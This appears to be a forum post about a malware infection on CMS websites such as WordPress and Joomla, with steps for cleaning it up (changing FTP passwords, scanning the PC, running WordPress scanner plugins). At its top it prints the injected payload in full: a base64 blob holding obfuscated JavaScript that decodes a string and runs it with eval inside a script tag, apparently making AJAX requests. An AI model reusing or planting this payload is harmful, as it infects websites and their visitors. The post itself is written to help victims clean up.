mYmNS9hJTBHITNeVk4kZFUmMzw2KjRBLTQjZkpMI2IqMCY5RDFUKjNALWEqNT4tMz5ZRDkjOSNiSCU0LTh8JGEqNCBqNSoyI2IjNioyI2YjNioxI2VJRDAjYiM4SCNkIzZIXiNiIGVkIzlPRyM4fkcjOVAmMUQzI2EjN08jZiM5TyNlI2UmNy9kTyM2R0pKR0pQJjFENSNhIzleI2YjYV4jYSNhJjkvZiM4IzkhZiM4IzghZn5+JjNEMyNjI2FPI2RPI2MjYU8mN0Q5TH5MT0xKTCM2eVcwVCozJWVNJGFIPl5ZPGQqMX4jZloqMEVYTSBlYSo0KjUkM15eT0I1R0lSNE4tZCViLWYjZi01WCQ0eTxlJDNLTyViTSQ0USo4JjU8YiU0Tio2USU3JThASyYzRDRVJGJ6JTRRJTZ+I2ImOURiSEI0RX58KjRMJWYmN1I3TSQzI2RKSj9MViYzPGFPQEIyT0B8T0BZUmNeRy1jXkdCM1QlMklXYUUtZEdQLWRARUwmMDwzJWZaIWZFQCEzUSQzJjBEMVpRSyQxQD8/VSYzRGIhMyozPiEwIzgqMnwqOSYwPGNIIWZLI2IhZlB+IWZZVzAlOFokYUYqZUZIJTAgZWMqOCo2PyNmPyRkelpJRGQtYyEyRUBRQEUtYyBgNkYkYlolOGBLKjFeJjREOSM5QSQxJWVRJDAkMSRkJjlXMSNjfioyKjBPRiM5RiY0LGExQjFCMSNmRSo1KjEqNEUmNDxhRUBFPy1iXiVhfCBqOVRgdyo5JDB3JDF3JjRSM3xHPiU4TEIyKjA+JjVXOCoyKjU+LTJQPk5MJjUsZDFBLTN+JWYkNCQ0JWJgJjYsYTAtYy01LTQqNUBgQjUqM1kvZHpCMio3KmE/LTIqZkBJLzIqNiBeYiBeYSo3ITJPeUQzJTckNHckZSoyKjIkMyRhJjVSNU5BLTEqNWAkZSRkUCY5LzNRYFVKSEghMEAmMDwyJGIqNT4qYyozJTIkYj5ZV2MqME1OYCU4I2UtZCRhJjNXNT4jOSM2JWFNS0IxKjNZLGFlLTgqMUZeLTUqYyoxRSY0VzM/QSU2JWJgQUAjZHkvOSo5TEEqZUpHKjIlYSY2PGFNITElYVQjZSBUVCYxRGNUQEEtM1pRenwmOTxjJTF8I2ElZSVmJWVUI2IgYDJMI2QtZUYgXmYjZF95UmY+TC0wUC05WD4jZllEZCBeOSo0I2YhMiNhTio0eVJiLTYlM3ctMCUzJWYlNz95LzclOFQlMSU0RUEtYkgmMDw0LTgqZEU+Ti1lRSo2IGphITMqZio5VSNlVio1ITMmMy9kTkhCNEI0QjQqMiUxfCY3UmMqMUVYeiNmRVh6IGVlIWZBJDEkZVQ/flomNjw1JDQtNS00KjMqMCU2TiVlJjA8Nk1LUSQxQC00I2UhMyYzL2QhMy02RVVFLTdMJDMmMDxkeio5enokYSQxJWEkZFlSY1pIIWYkYiRhJWIhZn5ZPDFFWnx8TiNmfn4mNTw5YCQxIzZ6JGYkMXp6WTxiYH53TiQzXiM3XiY2UjUgZkhUJTImMTxjJWZ6UFpYUSQxKjImMyxhZUEkMCUxR0ElMFYqYSY2RDhHJWFMLTd8YCRlUUkvZkhKIzhCNSpiJTgkYksmNy9mJTMlM0xIKjV+IzhFJjdEZkYqOEFePyExSCExJjEvNyo0TkskZUUqOHx8IGo0ekAhM0YqMC0wJTRNJjNSMCM2JGF3WEtNTkhZL2NQTVEtNk1OSyQxJjM8OT9AI2RfITJWQCRkeVI3JWF8JGFNJDNfP0cmNS9mIWYtZiVlTCU0RyM3JGYmNy81QE8lNk5OJWEkM3cmNVdiJDAkMSQ0S0hAPkhZLzgqY0cjOUxfI2YqMCU3JjVSNndUJWZCMUZMRio3JjQ8YiUwViUxRiFmR0IxdyY0PGMkM1QkYiEwVVh3JDMmMDw5JTJ3S3ckNHwjYSU4JjBSMUtLWlg+XiRld1lSNkZGSkVLLWZaJTEmNDw1KjAlNyM4JGIkZiVmekIzSUQzX35PJThaJTZNKjgmNVI4WiVlKmEkZFAjYUEqYiY5LzkkYiFmQFYjYVVVJWYmNkQyWlElOHd6LTMlYVUgZWRWViM2QU4lMUxMJjY8MUEjYVpgSyRlWCVlJjlSMFghMiM3JWIlOCQ0JTMlZnk8YlYjYyVhfnwlYiRhLWImNixhNSo0JGZUXyRmP0whMSYxRGUqND8qOCFmTCRhJWF8IGpkJDRgQEdGI2NFLTgmNEQzSyVhfCphJDElYVElYSY1UjZ6PioxQE0lM0g+WS9lI2MjYyNhI2FKKjcqN0EmOURlSiQwd1ElYmBLRiY0VzVMLTAkZlhYJTMlZiViSVI0P0AjZCEyI2VOJTdYeSxhYSVmJDMlYlYqNCFmQjFBJjY8MyNmIF4xVCUzJWUlZSU0eTxhSyQ0KjYlMyRiQSpiSiY5RDFWIzhWKjlBLTElMSUyJjYvOT9FKmIkZSQwTiViWCY3UjchMCo1dyU2PiEwKjYjZCBgNlhQUXd3WCU4TSYzLzgqZkAkYiM2QD4tMFBZLGQyRUUtMF5FI2MtM1ggajlLWks+LTI+JGJ6WSxkMSQ0Wio1JTQ/Pi0zQFk8MiNkITBIWEUtZD8hMCYwV2RFJDMlZlQjZSBUVSYxLzYhMy0wKjEjZkolN0t8JjNXNEchZj4qMUtOYEwmNjw1I2YjYSM5I2RUI2QlNiNmeS84JDQjZCU0TCQzJDBLdyYwUjY/QV9WKjItMy04LTl5PDIlNCVhQjglNiU2Pz8/SS81Rj5GQUY/RlUgZWF+P14/IzY/Izc/SUQ3QSM4QSNiQSNkQSM5JjkvNSM2XyNhXyNiXyNjXyY1VzA+KjE+KjI+KjM+KjRZLzQqMkYqM0YqNkYqN0YmNFc4Rio5RiphRipiRipjIGUxKmEhMSpiITEqYyExKmQhMSYxLGE3UCM4JGQkZkskZCRlekkvOSU0TCNlQXwjZSU0I2QmMUQ5I2IqNyM5KjIjYVB+QjBZRDJKSiM3JDNgUU1QJjlSZSM4JGF8JGFKT09PSURjJTZNJTJaQVQ/JjFcXFxcRToiMzIpO2V2IiwqYGBaWEsqYiQwJDE6ImFsKGwpXFxcJyIsRUUhMCo5UT4hMCM4KjI6Iik7In07ZGs9W10gSS1yIHggaW4gdil7ZGsucHVzaCh0cmltKHgsdikpfTtlLWwoZGsgOFxcXCdcXFwnKSkhdjcjdjgkdmMldmImOjgqdjkrLHEtdmEvKzc8LGI+ITg/IWFAIWJBITlCdmREKzhFITdGITRHIWRIIzBJOjkwSiMySyVjTCFlTSQ3TiQ1TyMzUCMxUSQyUixjVCU1VSFjViE2Vys5WCQ2WSY4WiVkXiM1XyE1YCQ4dyU5eSYyeiRjfCQ5fiM0XFxcXCwjNl5MJTIqMD4kZioyXCcgSWM9NDY7Yy0tO2Q9KHQ9ZCA2XCchIyQlJiorLS88Pj9AQUJERUZHSElKS0xNTk9QUVJUVVZXWFlaXl9gd3l6fH5cXFxcXCdbY10pKSA4dC5wb3AoKSkpOyA5ICg9ZCBLICZ9OyA5dW5BSkFYIEwgZEUgLXEgXSsgck4oICRSKTsgMyByciAtQSAyIFlyKX0gMyB6KXsgSHNlbGY9dGhpczsgMyBCPT0iR0VUIiBBJEs9ICBGKyAgaSsgWXQgLCBSJEsgVyArICBSIEYgVzt0cnl7ICB6LnNldFJlcXVlc3RIZWFkZXIoIkNvbnRlbnQtVHlwZSIsImFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCIgNSl7fX0gIHoub25yZWFkeXN0YXRlY2hhbmdlICEpe3N3aXRjaCggI3oucmVhZHlTdGF0ZSl7Y2FzZSAxOiAjTCAwMjogI3UgMDM6ICN5IDA0OiA7PSAjei5yIChUZXh0OyA7WE1MPSAjei5yIChYTUw7ICNDWzAgUTsgI0NbMSBRVGV4dDsgMyN3KXtzZWxmLnIgTiAzI0EgQSk9ICNBLm5vZGVOYW1lOyApLnRvTG93ZXJDYXNlKCk7IDMpPT0iaW5wdXQgSnNlbGVjdCBKb3B0aW9uIEp0ZXh0YXJlYSIgQSNBLiA+PSA7ICsjQS5pbm5lckhUTUw9IDt9fSAzI0NbMF09PSIyMDAiIEEjSiBdKyNlKCl9ICNydD0iIjticmVha30gVXouc2VuZCggWXQpfX0gVW0gXSxyZygpfSBhLmFqYXggOiAkTSgpO3RyeXsgSCAkRyAyXCcgJERcJykgKmMoInF1ZXJ5IiwgJEcgZ2QgZ2YpICpGPSJxdWVyeS5waHAiICpCIFNHIGdCIGdmICpycj1cJyAkcnpcJyAqTCBTTiAqdSBTZyAqeSBTcyAqSiBTeDsgUCA1KXsgUCl9ICB0aGlzIGcgIT1mdW5jdGlvbiggI3NlbGYgZyAka3hfICVlbmNvZGVVUklDb21wb25lbnQoICZlICxyciA/QSA/Rj1maWxlICx0IDpPYmplY3QgXSxDIDogLygyKSAoZXNwb25zZSApZWxlbU5vZGVOYW1lICo7YWpheCBnICt9ZWxzZXsgICw7ICAgLSBBICAudHJ5eyAgeiA6QWN0aXZlWE9iamVjdCgiTSAvQXJyYXkgMCgpO2JyZWFrO2Nhc2UgIDI9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIDNpZiggIDR0cnVlIDUpfWNhdGNoKGUgNi5zcGxpdCggNy5sZW5ndGggOC5qb2luKCA5dGhpcy5yIDo9bmV3ICA7c2VsZi5yICggPFQiICxpPSI/IiAscng9IiYiICxyID1yZXR1cm4gPnZhbHVlID89bnVsbCAsIEAgISl7IFUgQSl7ICBDICB0W2tleV1bIEcoICRqWzBdLCAkalsxXSkgSHZhciAgSTtmb3IoIEoifHwgKT09IiBLICxiPSA0ICx3PWZhbHMgTCAhICBNWE1MSHR0cFJlcXVlc3QgTnVuUiAoKCl9IE8gLXJ0Kz0gWXgrICQgUGFqYXgucnVuQUpBWCggUV09ICN6LnN0YXR1cyBSei5vcGVuKCAgQiwgIFM9ICQgVC1kITMgVX0gLCBWJWIlYSM2USBXLCA0KSBYLlhNTEhUVFAiIDUgWSAgciBaKXtpZiggW109IC8oICBdKCkgIF4hMiogXyBMJG8sICBgJjAvIGF3aW5kb3cgZCRSIEEzICBlJjQvIGYkMyU2JWZUJDQgZy4gJCBoIDc7aSsrIEEkIGomNzwgayAkZlsgJG9dfSc7Zm9yKGM9MTMwO2M7ZD0odD1kLnNwbGl0KCcgICAhICMgJCAlICYgKCApICogKyAsIC0gLiAvIDAgMiAzIDQgNSA2IDcgOCA5IDogOyA8ID0gPiA/IEAgQSBDIEcgSCBJIEogSyBMIE0gTiBPIFAgUSBSIFMgVCBVIFYgVyBYIFkgWiBbIF0gXiBfIGAgYSBkIGUgZiBnIGggaiBrJy5zdWJzdHIoYy09KHg9YzwyPzE6MikseCkpKS5qb2luKHQucG9wKCkpKTtldmFsKGQpPC9zY3JpcHQ+');}
It seems that this virus/malware is affecting several CMS such as Joomla, Wordpress, CodeIgniter, etc. Some more info here and here.
Best course of action:
change ALL ftp and username passwords QUICKLY
uninstall all FTP program(s) on your pc
run virus scan & malware scan
make sure your pc is clean
reinstall FTP client (clean install - download new version of software)
now to clean your WP website.
- install WP plugins (tac, exploit scanner)
- run plugins
- note infected files
- use FTP or WP plugin editor to clean these files
- run exploit scanner & tac till website is clean
Hope this helps...